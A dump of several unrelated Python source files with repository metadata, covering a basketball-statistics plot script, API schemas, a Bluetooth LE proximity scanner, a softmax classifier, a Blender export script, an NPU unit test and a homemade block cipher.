pd.concat([lbs_df_all, lbs_df], axis=1) print(lbs_df_all) lbs_df_all.to_pickle("lbs_df_all.pkl") def plot_hist(lbs, year): m = round(np.mean(lbs),3) plt.title("Error lower bound histogram \n NBA season {}".format(year)) plt.hist(lbs) plt.axvline(np.mean(lbs), color='red', label="mean = {}".format(m)) plt.xlim(0,1) plt.xlabel("classification error") plt.legend() plt.savefig("result/nba_hist_{}.pdf".format(year), format='pdf') plt.show() print("mean : ", np.mean(lbs)) print("median : ", np.median(lbs)) print("min : ", np.min(lbs)) print("max : ", np.max(lbs)) print("std : ", np.std(lbs)) def main(): print("*******************************************************") print("*******************************************************") print("********** Running the Testing Scripts. ***************") plt.rcParams.update({'font.size': 14}) plt.rcParams.update({'figure.autolayout': True}) # save_data() lbs_df_all = pd.read_pickle("lbs_df_all.pkl") plot_hist(lbs_df_all[213], 2013) plot_hist(lbs_df_all[218], 2018) # box plot lbs_df_all.columns=["2013","2014","2015","2016", "2017", "2018"] plt.title("P(e) distribution per season") lbs_df_all.boxplot() plt.xlabel("season") plt.ylabel("probability of error") # plt.ylim(0.1,0.4) plt.savefig("result/nba_box.pdf", format='pdf') plt.show() print("********** Testing Scripts Done. **********************") print("*******************************************************") print("*******************************************************") if __name__ == "__main__": main()
30.595455
121
0.584609
d0d7db0a1ae0211e4a93003ccc794d34f0b8ed0d
2,046
py
Python
project/api/push_registration/schemas.py
DanielGrams/cityservice
c487c34b5ba6541dcb441fe903ab2012c2256893
[ "MIT" ]
null
null
null
project/api/push_registration/schemas.py
DanielGrams/cityservice
c487c34b5ba6541dcb441fe903ab2012c2256893
[ "MIT" ]
35
2022-01-24T22:15:59.000Z
2022-03-31T15:01:35.000Z
project/api/push_registration/schemas.py
DanielGrams/cityservice
c487c34b5ba6541dcb441fe903ab2012c2256893
[ "MIT" ]
null
null
null
from marshmallow import fields, validate from marshmallow_enum import EnumField from project.api import marshmallow from project.api.schemas import ( IdSchemaMixin, PaginationRequestSchema, PaginationResponseSchema, SQLAlchemyBaseSchema, TrackableSchemaMixin, WriteIdSchemaMixin, ) from project.models import PushPlatform, PushRegistration class PushRegistrationModelSchema(SQLAlchemyBaseSchema): class Meta: model = PushRegistration load_instance = True class PushRegistrationIdSchema(PushRegistrationModelSchema, IdSchemaMixin): pass class PushRegistrationWriteIdSchema(PushRegistrationModelSchema, WriteIdSchemaMixin): pass class PushRegistrationBaseSchemaMixin(TrackableSchemaMixin): device = marshmallow.auto_field( required=True, validate=validate.Length(min=3, max=255) ) platform = EnumField(PushPlatform) token = marshmallow.auto_field(required=True) class PushRegistrationSchema(PushRegistrationIdSchema, PushRegistrationBaseSchemaMixin): pass class PushRegistrationRefSchema(PushRegistrationIdSchema): device = marshmallow.auto_field() platform = EnumField(PushPlatform) class PushRegistrationListRequestSchema(PaginationRequestSchema): token = fields.Str() class PushRegistrationListItemSchema(PushRegistrationRefSchema): token = marshmallow.auto_field() class PushRegistrationListResponseSchema(PaginationResponseSchema): items = fields.List( fields.Nested(PushRegistrationListItemSchema), metadata={"description": "Push registrations"}, ) class PushRegistrationPostRequestSchema( PushRegistrationModelSchema, PushRegistrationBaseSchemaMixin ): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.make_post_schema() class PushRegistrationPatchRequestSchema( PushRegistrationModelSchema, PushRegistrationBaseSchemaMixin ): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.make_patch_schema()
26.921053
88
0.776637
ef4129fc1359955e99c61603c6a5cca46844bb29
9,561
py
Python
code/sensors/bluetooth/bluetooth.py
dieterpl/iDogstra
62ee246763e107335b9caf0a4f96239fa0953234
[ "MIT" ]
null
null
null
code/sensors/bluetooth/bluetooth.py
dieterpl/iDogstra
62ee246763e107335b9caf0a4f96239fa0953234
[ "MIT" ]
null
null
null
code/sensors/bluetooth/bluetooth.py
dieterpl/iDogstra
62ee246763e107335b9caf0a4f96239fa0953234
[ "MIT" ]
null
null
null
# BLE Scanner based on https://github.com/switchdoclabs/iBeacon-Scanner-/blob/master/blescan.py # BLE = Bluetooth Low Energy import os import sys import struct import bluetooth._bluetooth as bluez import math import time import logging from enum import Enum from collections import deque, namedtuple from threading import Thread, Lock import config from utils.functions import current_time_millis, overrides from sensors.pipeline import Pipeline OGF_LE_CTL = 0x08 OCF_LE_SET_SCAN_ENABLE = 0x000C LE_META_EVENT = 0x3e EVT_LE_CONN_COMPLETE = 0x01 EVT_LE_ADVERTISING_REPORT = 0x02 # Named tuple that represents the data that the ble scan returns FindResult = namedtuple("FindResult", "uuid rssi") def returnstringpacket(pkt): """Returns a packet as hex string""" myString = "" for c in pkt: myString += "%02x" % c return myString def parse_events(sock, target_uuid, loop_count=100): """Parses the events that the bluetooth socket recieves""" old_filter = sock.getsockopt(bluez.SOL_HCI, bluez.HCI_FILTER, 14) flt = bluez.hci_filter_new() bluez.hci_filter_all_events(flt) bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT) sock.setsockopt(bluez.SOL_HCI, bluez.HCI_FILTER, flt) result = None for i in range(0, loop_count): pkt = sock.recv(255) ptype, event, plen = struct.unpack("BBB", pkt[:3]) if event == LE_META_EVENT: subevent = pkt[3] pkt = pkt[4:] if subevent == EVT_LE_ADVERTISING_REPORT: num_reports = pkt[0] report_pkt_offset = 0 for i in range(0, num_reports): uuid = returnstringpacket( pkt[report_pkt_offset - 22: report_pkt_offset - 6]) rssi = struct.unpack("b", pkt[report_pkt_offset - 1:])[0] if uuid == target_uuid: result = FindResult(uuid, rssi) break else: continue break sock.setsockopt(bluez.SOL_HCI, bluez.HCI_FILTER, old_filter) return result # A named tuple that defines how the received rssi values are stored. # Note that the rssi value is negative, whereas the data in this # tuple will be positive. DataTuple = namedtuple("DataTuple", "time strength") class DataList: """This is a snapshot of the bt dongle data. It contains multiple values in a list and provides convenience methods to analyse the data""" def __init__(self, threshold, data_list): """threshold is the amount of time this snapshot is representing. data_list is the list of DataTuple's""" self.threshold = threshold self.data_list = data_list def __len__(self): """Returns the amount of data this snapshot contains""" return len(self.data_list) def avg(self): """Returns the average of all values""" s = 0 for _, strength in self.data_list: s += strength count = len(self) return s / count if count > 0 else 0 def variance(self): """Returns the variance of all values""" s = 0 avg = self.avg() for _, strength in self.data_list: s += (strength - avg)**2 count = len(self) return s / count if count > 0 else 0 def standard_deviation(self): """Returns the standard deviation of all values. Equivalent to math.sqrt(self.variance())""" return math.sqrt(self.variance()) class BTDongle: """Manages a single bluetooth dongle and stores the received data. The data is stored in a double ended queue (deque) which allows accessing the newest and oldest data in a very efficient way. For performance reasons older data is being deleted, each time, new data is inserted.""" def __init__(self, dev_id, target): self.dev_id = dev_id self.target = target self.sock = None self.data = deque() self.lock = Lock() self.current = 0 self.thread = Thread(target=self.scan_loop) self.offset = 0 def start(self): """Initializes the bluetooth socket, and starts reading rssi values in a new thread""" # Open the bt socket self.sock = bluez.hci_open_dev(self.dev_id) # Enable ble scan bluez.hci_send_cmd( self.sock, OGF_LE_CTL, OCF_LE_SET_SCAN_ENABLE, struct.pack("<BB", 0x01, 0x00)) # Start scanning in a new thread self.thread.start() def remove_old_data(self, threshold=10000): """Removes data tuples from the queue that are older than threshold milliseconds""" threshold = current_time_millis() - threshold try: self.lock.acquire() while(len(self.data) > 0 and self.data[0].time < threshold): self.data.popleft() finally: self.lock.release() def add_data(self, rssi): """Adds a new rssi value. This also calls self.remove_old_data()""" # Positive rssi values are very rare, and indicate a very # good connection. We simplify this by setting the value to # 0, which indicates the best possible strength in our terms. if rssi > 0: rssi = 0 # Remove old entries from the queue that are older than 10 sec self.remove_old_data() # Add the new rssi value to the data queue try: self.lock.acquire() self.data.append(DataTuple( current_time_millis(), abs(rssi) + self.offset)) finally: self.lock.release() def scan(self): """Scans a single time for ble beacons""" result = parse_events(self.sock, self.target, loop_count=10) if result != None: self.add_data(result.rssi) def scan_loop(self): """Scans in a loop for ble beacons. Simply calls self.scan() in a while True loop""" while True: self.scan() def snapshot_data(self): """Returns a snapshot of the data in form of a DataList object. This contains all data that has been collected in the last threshold milliseconds""" threshold = current_time_millis() - config.BT_TIME_THRESHOLD data_list = [] try: self.lock.acquire() for t in reversed(self.data): # Stop when data is too old if t.time < threshold: break data_list.append(t) finally: self.lock.release() return DataList(threshold, data_list) class SnapshotBTDataPipeline(Pipeline): """A pipeline that takes a list of BTDongle objects and extracts a snapshot of the collected data""" def __init__(self): Pipeline.__init__(self) @overrides(Pipeline) def _execute(self, inp): """Takes a list of BTDongle objects and returns a list of DataList objects which are a snapshot of the collected bluetooth data""" if len(inp) == 0: return (False, None) return (True, [dongle.snapshot_data() for dongle in inp]) class RecommendedSpeedPipeline(Pipeline): """A pipeline that takes multiple DataList objects and recommends a speed for the roboter based on the signal strenght""" def __init__(self): Pipeline.__init__(self) self.min_speed = config.BT_MIN_SPEED self.threshold = config.BT_MOVEMENT_RSSI_THRESHOLD self.multiplier = config.BT_MULTIPLIER @overrides(Pipeline) def _execute(self, inp): """Takes a list of DataList objects, and returns the recommended speed in the interval [0;100]""" if len(inp) == 0: return (False, None) data_count = sum(len(data) for data in inp) logging.debug("data_count=" + str(data_count)) if data_count == 0: return (False, None) avg_strength = sum(data.avg() for data in inp) / len(inp) logging.info("avg_strength=" + str(avg_strength)) speed = 0 if avg_strength >= self.threshold: speed = min(100, self.min_speed + self.multiplier * (avg_strength - self.threshold)) return (True, speed) class UserDistanceEstimationPipeline(Pipeline): """A pipeline that return the distance of the user in three areas far, medium, near""" class Distance(Enum): FAR = 3 MEDIUM = 2 NEAR = 1 def __init__(self): Pipeline.__init__(self) self.far_threshold = config.BT_DISTANCE_THRESHOLDS["far"] self.medium_threshold = config.BT_DISTANCE_THRESHOLDS["medium"] self.near_thresholds = config.BT_DISTANCE_THRESHOLDS["near"] @overrides(Pipeline) def _execute(self, inp): """Takes a list of DataList objects, and returns the recommended speed in the interval [0;100]""" if len(inp) == 0: return (False, None) data_count = sum(len(data) for data in inp) logging.debug("data_count=" + str(data_count)) if data_count == 0: return (False, None) avg_strength = sum(data.avg() for data in inp) / len(inp) logging.info("avg_strength=" + str(avg_strength)) if avg_strength > self.far_threshold: return True, self.Distance.FAR if avg_strength > self.medium_threshold: return True, self.Distance.MEDIUM return True, self.Distance.NEAR
32.85567
95
0.62368
328cb6307f70f83df483c16ebad3fab11c697ef4
2,824
py
Python
src/lecture2/logistic_regression/naive_softmax_regression.py
Fassial/zju-intern
f421f9c97d3c567e9b97121c5bf5c675c9e2c721
[ "MIT" ]
1
2020-08-17T07:09:09.000Z
2020-08-17T07:09:09.000Z
src/lecture2/logistic_regression/naive_softmax_regression.py
Fassial/zju-intern
f421f9c97d3c567e9b97121c5bf5c675c9e2c721
[ "MIT" ]
null
null
null
src/lecture2/logistic_regression/naive_softmax_regression.py
Fassial/zju-intern
f421f9c97d3c567e9b97121c5bf5c675c9e2c721
[ "MIT" ]
2
2020-07-26T07:27:57.000Z
2020-08-17T07:09:15.000Z
""" Created on August 02 00:06, 2020 @author: fassial """ import numpy as np import matplotlib.pyplot as plt # local dep import .utils def load_dataset(file_path): dataMat = [] labelMat = [] fr = open(file_path) for line in fr.readlines(): lineArr = line.strip().split() dataMat.append([1.0, float(lineArr[0]), float(lineArr[1])]) labelMat.append(int(lineArr[2])) return dataMat, labelMat def train(data_arr, label_arr, n_class, iters = 1000, alpha = 0.1, lam = 0.01): ''' @description: softmax 训练函数 @param {type} @return: theta 参数 ''' n_samples, n_features = data_arr.shape n_classes = n_class # 随机初始化权重矩阵 weights = np.random.rand(n_class, n_features) # 定义损失结果 all_loss = list() # 计算 one-hot 矩阵 y_one_hot = one_hot(label_arr, n_samples, n_classes) for i in range(iters): # 计算 m * k 的分数矩阵 scores = np.dot(data_arr, weights.T) # 计算 softmax 的值 probs = softmax(scores) # 计算损失函数值 loss = - (1.0 / n_samples) * np.sum(y_one_hot * np.log(probs)) all_loss.append(loss) # 求解梯度 dw = -(1.0 / n_samples) * np.dot((y_one_hot - probs).T, data_arr) + lam * weights dw[:,0] = dw[:,0] - lam * weights[:,0] # 更新权重矩阵 weights = weights - alpha * dw if i % 10 == 0: print("iter:", i, ",accu:", np.sum(np.argmax(probs, axis=1).reshape((-1,1)) == label_arr)/label_arr.shape[0]) return weights, all_loss def softmax(scores): # 计算总和 sum_exp = np.sum(np.exp(scores), axis = 1,keepdims = True) softmax = np.exp(scores) / sum_exp return softmax def one_hot(label_arr, n_samples, n_classes): one_hot = np.zeros((n_samples, n_classes)) one_hot[np.arange(n_samples), label_arr.T] = 1 return one_hot def predict(test_dataset, label_arr, weights): scores = np.dot(test_dataset, weights.T) probs = softmax(scores) return np.argmax(probs, axis=1).reshape((-1,1)) DATASET = 'mnist.pkl.gz' if __name__ == "__main__": # get datasets datasets = utils.load_data(dataset = DATASET) (x_train, y_train), (x_valid, y_valid), (x_test, y_test) = datasets #gen_dataset() data_arr, label_arr = x_train, y_train.reshape((-1,1)) weights, all_loss = train(data_arr, label_arr, n_class = 10) # 计算预测的准确率 test_data_arr, test_label_arr = x_test, y_test.reshape((-1,1)) n_test_samples = test_data_arr.shape[0] y_predict = predict(test_data_arr, test_label_arr, weights) accuray = np.sum(y_predict == test_label_arr) / n_test_samples print(accuray) # 绘制损失函数 fig = plt.figure(figsize=(8,5)) plt.plot(np.arange(1000), all_loss) plt.title("Development of loss during training") plt.xlabel("Number of iterations") plt.ylabel("Loss") plt.show()
30.695652
133
0.632436
de502f0d7295c12268e568b5024a69d8b04cd49a
196
py
Python
ib_connection/IBConnector.py
nic-fillion/SMALET
011844a2ee23383f4cbd9df4f394de086f873fc6
[ "MIT" ]
null
null
null
ib_connection/IBConnector.py
nic-fillion/SMALET
011844a2ee23383f4cbd9df4f394de086f873fc6
[ "MIT" ]
null
null
null
ib_connection/IBConnector.py
nic-fillion/SMALET
011844a2ee23383f4cbd9df4f394de086f873fc6
[ "MIT" ]
null
null
null
from threading import Thread import logging class IBConnector: def __init__(self, app): self.thread = Thread( target=self.run, name='IB connector', )
17.818182
32
0.591837
dec2f2a79acc00ab4ec810defae9b44030b079a9
5,812
py
Python
contents/blender_export.py
cutec-chris/sce
da1f906ff4a049722b8968eeab8a07b411c92a8c
[ "MIT" ]
null
null
null
contents/blender_export.py
cutec-chris/sce
da1f906ff4a049722b8968eeab8a07b411c92a8c
[ "MIT" ]
null
null
null
contents/blender_export.py
cutec-chris/sce
da1f906ff4a049722b8968eeab8a07b411c92a8c
[ "MIT" ]
null
null
null
import bpy,pathlib,mathutils,math,os def IsNewer(File1,File2): try: return os.path.getmtime(str(File1))<os.path.getmtime(str(File2)) except: return True def ExportObject(File,Object,TargetName,lod=[10],lod_ligthing=50,**kwargs): File = pathlib.Path(File) if IsNewer(TargetName+'_10.glb',File): bpy.ops.wm.open_mainfile(filepath=str(File.absolute())) for collection in bpy.data.collections: collection.hide_viewport = collection.name != Object collection.hide_select = collection.name != Object collection.hide_render = collection.name != Object if collection.name == Object: print(collection.name) target_obj = collection for obj in collection.all_objects: print(" obj: ", obj.name) target_obj = obj if 10 in lod: bpy.ops.export_scene.gltf(filepath=TargetName+'_10.glb',use_visible=True,export_cameras=False,export_apply=True,**kwargs) if 0 in lod\ and (IsNewer(TargetName+'_0.glb',File)): GenerateLOD0Object(target_obj,TargetName,lod_ligthing=lod_ligthing) #bpy.ops.wm.save_mainfile(filepath=str(File.absolute())+'out.blend') def GenerateLOD0Object(target_obj,TargetName,Resolution=400,Blending='CLIP',lod_ligthing=50): # remove default light bpy.ops.object.select_by_type(type='LIGHT') bpy.ops.object.delete(use_global=False) #add light bpy.ops.object.light_add(type='AREA') light = bpy.context.object light.data.energy = lod_ligthing #add camera for rendering bpy.ops.object.camera_add() bpy.data.cameras['Camera'].type = 'ORTHO' camera_object = bpy.data.objects['Camera'] center = sum((mathutils.Vector(b) for b in target_obj.bound_box), mathutils.Vector())/8 bpy.data.cameras['Camera'].ortho_scale = 20 pmw = target_obj.matrix_world coords = [t for b in target_obj.bound_box for t in pmw @ mathutils.Vector(b)] #render 2 images from object bpy.context.scene.render.film_transparent = True bpy.context.scene.render.image_settings.color_mode = 'RGBA' for scene in bpy.data.scenes: scene.render.resolution_x = Resolution scene.render.resolution_y = Resolution #scene.render.image_settings.file_format = 'JPEG' camera_object.location = center camera_object.rotation_euler = (math.radians(90), 0, math.radians(-90)) v, scale = camera_object.camera_fit_coords(bpy.context.evaluated_depsgraph_get(), coords) camera_object.location = v light.location = v light.rotation_euler = camera_object.rotation_euler bpy.data.cameras['Camera'].ortho_scale = scale bpy.context.scene.camera = camera_object bpy.context.scene.render.filepath = "orthogonal1.png" bpy.ops.render.render(write_still = True) camera_object.location = center camera_object.rotation_euler = (math.radians(90), 0, 0) v, scale = camera_object.camera_fit_coords(bpy.context.evaluated_depsgraph_get(), coords) camera_object.location = v light.location = v light.rotation_euler = camera_object.rotation_euler bpy.data.cameras['Camera'].ortho_scale = scale bpy.context.scene.camera = camera_object bpy.context.scene.render.filepath = "orthogonal2.png" bpy.ops.render.render(write_still = True) #generate 2 planes with the images target_obj.hide_viewport = True bpy.ops.mesh.primitive_plane_add( size=2, calc_uvs=True, enter_editmode=False, align='WORLD', location=(0, 0, 0)) bpy.data.objects['Plane'].name = 'Plane1' bpy.data.objects['Plane1'].rotation_euler=(math.radians(90), 0, math.radians(90)) bpy.data.materials.new('Mat1') mat1 = bpy.data.materials['Mat1'] mat1.use_nodes = True mat1.blend_method = Blending tex1 = mat1.node_tree.nodes.new('ShaderNodeTexImage') img1 = bpy.data.images.load('orthogonal1.png') tex1.image = img1 mat1.node_tree.links.new(mat1.node_tree.nodes['Principled BSDF'].inputs['Base Color'], tex1.outputs[0]) mat1.node_tree.links.new(mat1.node_tree.nodes['Principled BSDF'].inputs['Alpha'], tex1.outputs[1]) mat1.node_tree.nodes['Principled BSDF'].inputs['Specular'].default_value = 0.0 print(mat1.node_tree.nodes['Principled BSDF'].inputs['Specular']) bpy.data.objects['Plane1'].active_material = mat1 bpy.ops.mesh.primitive_plane_add( size=2, calc_uvs=True, enter_editmode=False, align='WORLD', location=(0, 0, 0)) bpy.data.objects['Plane'].name = 'Plane2' bpy.data.objects['Plane2'].rotation_euler=(math.radians(90), 0, 0) bpy.data.materials.new('Mat2') mat2 = bpy.data.materials['Mat2'] mat2.use_nodes = True mat2.blend_method = Blending tex2 = mat2.node_tree.nodes.new('ShaderNodeTexImage') img2 = bpy.data.images.load('orthogonal2.png') tex2.image = img2 mat2.node_tree.links.new(mat2.node_tree.nodes['Principled BSDF'].inputs['Base Color'], tex2.outputs[0]) mat2.node_tree.links.new(mat2.node_tree.nodes['Principled BSDF'].inputs['Alpha'], tex2.outputs[1]) mat2.node_tree.nodes['Principled BSDF'].inputs['Specular'].default_value = 0.0 print(mat2.node_tree.nodes['Principled BSDF'].inputs['Specular']) bpy.data.objects['Plane2'].active_material = mat2 bpy.ops.export_scene.gltf(filepath=TargetName+'_0.glb',use_visible=True,export_cameras=False,export_apply=True) os.remove('orthogonal1.png') os.remove('orthogonal2.png') #https://blender.stackexchange.com/questions/130404/script-to-render-one-object-from-different-angles #https://blender.stackexchange.com/questions/128185/check-if-the-whole-plane-is-being-on-a-orthographic-camera-render-or-get-a-prop
47.252033
135
0.69563
deecb14b27d4af6713c4acee70d3adf22146b73f
527
py
Python
Utils/py/naoth/naoth/__init__.py
tarsoly/NaoTH
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
[ "ECL-2.0", "Apache-2.0" ]
null
null
null
Utils/py/naoth/naoth/__init__.py
tarsoly/NaoTH
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
[ "ECL-2.0", "Apache-2.0" ]
null
null
null
Utils/py/naoth/naoth/__init__.py
tarsoly/NaoTH
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
[ "ECL-2.0", "Apache-2.0" ]
null
null
null
import sys, os # add the current directory to search path sys.path.append(os.path.dirname(__file__)) # add Framework stuff (opencv) to search path versionPart = 'python2.7' if sys.version_info[0] == 2 else 'python3.6' fwPath = os.path.join(os.getenv('EXTERN_PATH_NATIVE'),'lib', versionPart, 'site-packages') if os.path.exists(fwPath): sys.path.append(fwPath) # import some of our classes from LogReader import LogReader, Parser from SPLMessage import SPLMessage, MixedTeamMessage from .BehaviorParser import BehaviorParser
35.133333
90
0.779886
19c29815db5e30f915c77de92c8ca4fd10a94afa
3,969
py
Python
test/test_npu/test_triangular_solve.py
Ascend/pytorch
39849cf72dafe8d2fb68bd1679d8fd54ad60fcfc
[ "BSD-3-Clause" ]
1
2021-12-02T03:07:35.000Z
2021-12-02T03:07:35.000Z
test/test_npu/test_triangular_solve.py
Ascend/pytorch
39849cf72dafe8d2fb68bd1679d8fd54ad60fcfc
[ "BSD-3-Clause" ]
1
2021-11-12T07:23:03.000Z
2021-11-12T08:28:13.000Z
test/test_npu/test_triangular_solve.py
Ascend/pytorch
39849cf72dafe8d2fb68bd1679d8fd54ad60fcfc
[ "BSD-3-Clause" ]
null
null
null
# Copyright (c) 2020, Huawei Technologies.All rights reserved. # Licensed under the BSD 3-Clause License (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://opensource.org/licenses/BSD-3-Clause # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import torch import numpy as np import sys import copy from common_utils import TestCase, run_tests from common_device_type import dtypes, instantiate_device_type_tests from util_test import create_common_tensor class TestTriangularSolve(TestCase): def generate_data(self, min, max, shape, dtype): input1 = np.random.uniform(min, max, shape).astype(dtype) npu_input1 = torch.from_numpy(input1) return npu_input1 def cpu_op_exec(self, input1, input2, input3, input4, input5): output = input1.triangular_solve(input2,upper=input3,transpose=input4,unitriangular=input5) return output def cpu_op_exec_float16(self, input1, input2, input3, input4, input5): input1 = input1.to(torch.float32) input2 = input2.to(torch.float32) output = input1.triangular_solve(input2,upper=input3,transpose=input4,unitriangular=input5) return output def npu_op_exec(self, input1, input2, input3, input4, input5): input1 = input1.to("npu") input2 = input2.to("npu") output = input1.triangular_solve(input2,upper=input3,transpose=input4,unitriangular=input5) output = output.to("cpu") return output def test_triangular_solve_float32(self, device): npu_input1 = self.generate_data(0, 100, (2,3) , np.float32) npu_input2 = self.generate_data(0, 100, (2,2) , np.float32) npu_true = True npu_false = False cpu_output = self.cpu_op_exec(npu_input1, npu_input2, npu_true, npu_false, npu_false) #npu_output = self.npu_op_exec(npu_input1, npu_input2, npu_true, npu_false, npu_false) #self.assertRtolEqual(cpu_output, npu_output) def test_triangular_solve_float32_zhuanzhi(self, device): npu_input1 = self.generate_data(0, 100, (2,3) , np.float32) npu_input2 = self.generate_data(0, 100, (2,2) , np.float32) npu_true = True npu_false = False cpu_output = self.cpu_op_exec(npu_input1, npu_input2, npu_true, npu_true, npu_false) #npu_output = self.npu_op_exec(npu_input1, npu_input2, npu_true, npu_true, npu_false) #self.assertRtolEqual(cpu_output, npu_output) def test_triangular_solve_float32_danwei(self, device): npu_input1 = self.generate_data(0, 100, (2,3) , np.float32) npu_input2 = self.generate_data(0, 100, (2,2) , np.float32) npu_true = True npu_false = False cpu_output = self.cpu_op_exec(npu_input1, npu_input2, npu_true, npu_false, npu_true) #npu_output = self.npu_op_exec(npu_input1, npu_input2, npu_true, npu_false, npu_true) #self.assertRtolEqual(cpu_output, npu_output) def test_triangular_solve_float16(self, device): npu_input1 = self.generate_data(0, 100, (2,3) , np.float16) npu_input2 = self.generate_data(0, 100, (2,2) , np.float16) npu_true = True npu_false = False cpu_output = self.cpu_op_exec_float16(npu_input1, npu_input2, npu_true, npu_false, npu_true) #npu_output = self.npu_op_exec(npu_input1, npu_input2, npu_true, npu_false, npu_true) #self.assertRtolEqual(cpu_output, npu_output) instantiate_device_type_tests(TestTriangularSolve, globals(), except_for='cpu') if __name__ == '__main__': torch.npu.set_device("npu:2") run_tests()
46.694118
101
0.705971
5f32060fe0adce3611e143101d45f84e96d9528c
7,738
py
Python
algorithm/implementation.py
xSAVIKx/SHUP-algorithm
d188add53da7ec0a163f02ea4ad49fa9f33d2402
[ "Apache-2.0" ]
null
null
null
algorithm/implementation.py
xSAVIKx/SHUP-algorithm
d188add53da7ec0a163f02ea4ad49fa9f33d2402
[ "Apache-2.0" ]
null
null
null
algorithm/implementation.py
xSAVIKx/SHUP-algorithm
d188add53da7ec0a163f02ea4ad49fa9f33d2402
[ "Apache-2.0" ]
null
null
null
from bitstring import pack, BitArray from algorithm.util import galNI, sbox_1, sbox_2, sbox_3, sbox_4 __author__ = 'Iurii Sergiichuk <[email protected]>' class MasterKey(object): def __init__(self, master_key_hex_string="0x3cc849279ba298b587a34cabaeffc5ecb3a044bbf97c516fab7ede9d1af77cfa"): self.key = BitArray(master_key_hex_string) self.session_keys_amount = 8 self.current_cycle_index = 0 self.master_key_round_shift_bits = 24 def get_round_keys(self): """ :return: list of round keys :rtype: list[RoundKey] """ if self.current_cycle_index: round_master_key = self.key.copy() round_master_key.ror(self.master_key_round_shift_bits * self.current_cycle_index) else: round_master_key = self.key.copy() round_keys = [] round_key_size = round_master_key.length / self.session_keys_amount for key_index in range(0, self.session_keys_amount): round_key = round_master_key[key_index * round_key_size:key_index * round_key_size + round_key_size] round_keys.append(RoundKey(round_key)) if self.current_cycle_index < 8: self.current_cycle_index += 1 else: self.current_cycle_index = 0 return round_keys class RoundKey(object): def __init__(self, key): """ :param key: round key :type key: BitArray """ self.key = key def set_round_key(self, key): self.key = key class Message(object): def __init__(self, message_bit_array=BitArray(length=256)): """ :param message_bit_array: message BitArray :type message_bit_array: BitArray """ self.message_block_amount = 8 self.normal_message_bits_amount = 256 self.message_bit_array = message_bit_array self.message = self.message_bit_array.tobytes() self._normalize_message() @classmethod def get_message_from_message_blocks(cls, message_blocks): message_bit_array = BitArray() for message_block in message_blocks: message_bit_array.append(message_block.message_block) return Message(message_bit_array) def set_message_as_string(self, message_string): self.message = message_string self.message_bit_array = BitArray(self.message_to_hex(message_string)) def message_to_hex(self, message_string): return '0x' + ''.join(x.encode('hex') for x in message_string) def _normalize_message(self): if self.message_bit_array.length > self.normal_message_bits_amount: self._trim_message() def _trim_message(self): self.message_bit_array = self.message_bit_array[0:self.normal_message_bits_amount] def get_message_blocks(self): message_bit_array = self.message_bit_array.copy() message_blocks = [] message_block_size = self.normal_message_bits_amount / self.message_block_amount padding_blocks_amount = ( self.normal_message_bits_amount - message_bit_array.length) / message_block_size padding_bits_amount = (self.normal_message_bits_amount - message_bit_array.length) % message_block_size if padding_bits_amount != 0: padding_block = BitArray('0b' + ''.join('0' for x in range(0, padding_bits_amount))) message_bit_array.prepend(padding_block) for padding_block_index in range(0, padding_blocks_amount): message_block = BitArray('0b00000000000000000000000000000000') message_blocks.append(MessageBlock(message_block)) for message_block_index in range(0, self.message_block_amount - padding_blocks_amount): message_block = message_bit_array[ message_block_index * message_block_size:message_block_index * message_block_size + message_block_size] message_blocks.append(MessageBlock(message_block)) return message_blocks def __unicode__(self): return self.message def __str__(self): return self.__unicode__() class MessageBlock(object): def __init__(self, message_block): """ :param message_block: message block :type message_block: BitArray """ self.message_block = message_block class Crypter(object): def __init__(self, master_key, message): """ :param master_key: master key :type master_key: MasterKey :param message: message :type message: Message """ self.master_key = master_key self.message = message self._crypt_message = None self._current_round = 1 self._rounds_amount = 8 def encrypt(self): self._crypt_message = self._one_round_crypt(self.message) while self._current_round != self._rounds_amount: self._crypt_message = self._one_round_crypt(self._crypt_message) return self._crypt_message def _one_round_crypt(self, message): round_keys = self.master_key.get_round_keys() message_blocks = message.get_message_blocks() crypt_block_list = [] for round_key, message_block in zip(round_keys, message_blocks): crypt_block = round_key.key ^ message_block.message_block crypt_block_list.append(MessageBlock(crypt_block)) # XOR first block with others for crypt_block_index in range(1, len(crypt_block_list)): crypt_block_list[0].message_block ^= crypt_block_list[crypt_block_index].message_block # make first block SL transformation crypt_block_list[0] = self.sl_transformation(crypt_block_list[0]) # make SL transformation with XOR to next block for crypt_block_index in range(1, len(crypt_block_list)): crypt_xored_with_previous_block = MessageBlock( crypt_block_list[crypt_block_index].message_block ^ crypt_block_list[ crypt_block_index - 1].message_block) crypt_block_list[crypt_block_index] = self.sl_transformation(crypt_xored_with_previous_block) for crypt_block_index in range(0, len(crypt_block_list) - 1): crypt_block_list[crypt_block_index].message_block ^= crypt_block_list[ len(crypt_block_list) - 1].message_block if self._current_round < 8: self._current_round += 1 return Message.get_message_from_message_blocks(crypt_block_list) def sl_transformation(self, crypt_block): """ :param crypt_block: crypt block :type crypt_block: MessageBlock """ s_0 = sbox_1[crypt_block.message_block[0:8].int] s_1 = sbox_2[crypt_block.message_block[8:16].int] s_2 = sbox_3[crypt_block.message_block[16:24].int] s_3 = sbox_4[crypt_block.message_block[24:32].int] crypt_block_result = self.mdr_transformation(pack('uint:8, uint:8, uint:8, uint:8', s_0, s_1, s_2, s_3)) return MessageBlock(crypt_block_result) def mdr_transformation(self, s_block): """ :param s_block: s-block :type s_block: BitArray """ mdr_0 = s_block[0:8].int mdr_1 = s_block[8:16].int mdr_2 = s_block[16:24].int mdr_3 = s_block[24:32].int g0, g1, g2, g3 = galNI result_0 = g0[mdr_0] ^ g1[mdr_1] ^ g2[mdr_2] ^ g3[mdr_3] result_1 = g3[mdr_0] ^ g0[mdr_1] ^ g1[mdr_2] ^ g2[mdr_3] result_2 = g2[mdr_0] ^ g3[mdr_1] ^ g0[mdr_2] ^ g1[mdr_3] result_3 = g1[mdr_0] ^ g2[mdr_1] ^ g3[mdr_2] ^ g0[mdr_3] return pack('uint:8, uint:8, uint:8, uint:8', result_0, result_1, result_2, result_3)
37.931373
